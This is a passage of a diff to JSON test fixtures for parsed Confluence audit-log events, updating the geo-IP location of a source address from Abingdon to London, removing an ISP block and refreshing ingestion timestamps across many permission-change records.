"region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14295,7 +13419,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222654424Z", + "ingested": "2021-12-14T14:34:31.513263674Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.262Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14376,20 +13500,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14397,7 +13515,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222656297Z", + "ingested": "2021-12-14T14:34:31.513265724Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.259Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14478,20 +13596,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14499,7 +13611,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222658229Z", + "ingested": "2021-12-14T14:34:31.513266219Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.257Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14580,20 +13692,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14601,7 +13707,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222660100Z", + "ingested": "2021-12-14T14:34:31.513266643Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.255Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14675,20 +13781,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14696,7 +13796,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222661983Z", + "ingested": "2021-12-14T14:34:31.513267033Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14777,20 +13877,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14798,7 +13892,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222663872Z", + "ingested": "2021-12-14T14:34:31.513267444Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14879,20 +13973,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14900,7 +13988,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222665736Z", + "ingested": "2021-12-14T14:34:31.513267867Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.249Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14974,20 +14062,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -14995,7 +14077,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222667607Z", + "ingested": "2021-12-14T14:34:31.513268254Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.247Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15076,20 +14158,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15097,7 +14173,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222669507Z", + "ingested": "2021-12-14T14:34:31.513268639Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.245Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15178,20 +14254,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15199,7 +14269,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222671388Z", + "ingested": "2021-12-14T14:34:31.513269085Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.242Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15273,20 +14343,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15294,7 +14358,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222673260Z", + "ingested": "2021-12-14T14:34:31.513269478Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.240Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15375,20 +14439,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15396,7 +14454,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222675160Z", + "ingested": "2021-12-14T14:34:31.513269860Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.238Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15477,20 +14535,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15498,7 +14550,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222677050Z", + "ingested": "2021-12-14T14:34:31.513270247Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.235Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15572,20 +14624,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15593,7 +14639,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222679021Z", + "ingested": "2021-12-14T14:34:31.513270626Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.231Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15674,20 +14720,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15695,7 +14735,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222681008Z", + "ingested": "2021-12-14T14:34:31.513271005Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.219Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15776,20 +14816,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15797,7 +14831,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222682888Z", + "ingested": "2021-12-14T14:34:31.513271394Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.192Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15864,20 +14898,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -15885,7 +14913,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:08:08.222684773Z", + "ingested": "2021-12-14T14:34:31.513271781Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.950Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -15959,20 +14987,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + 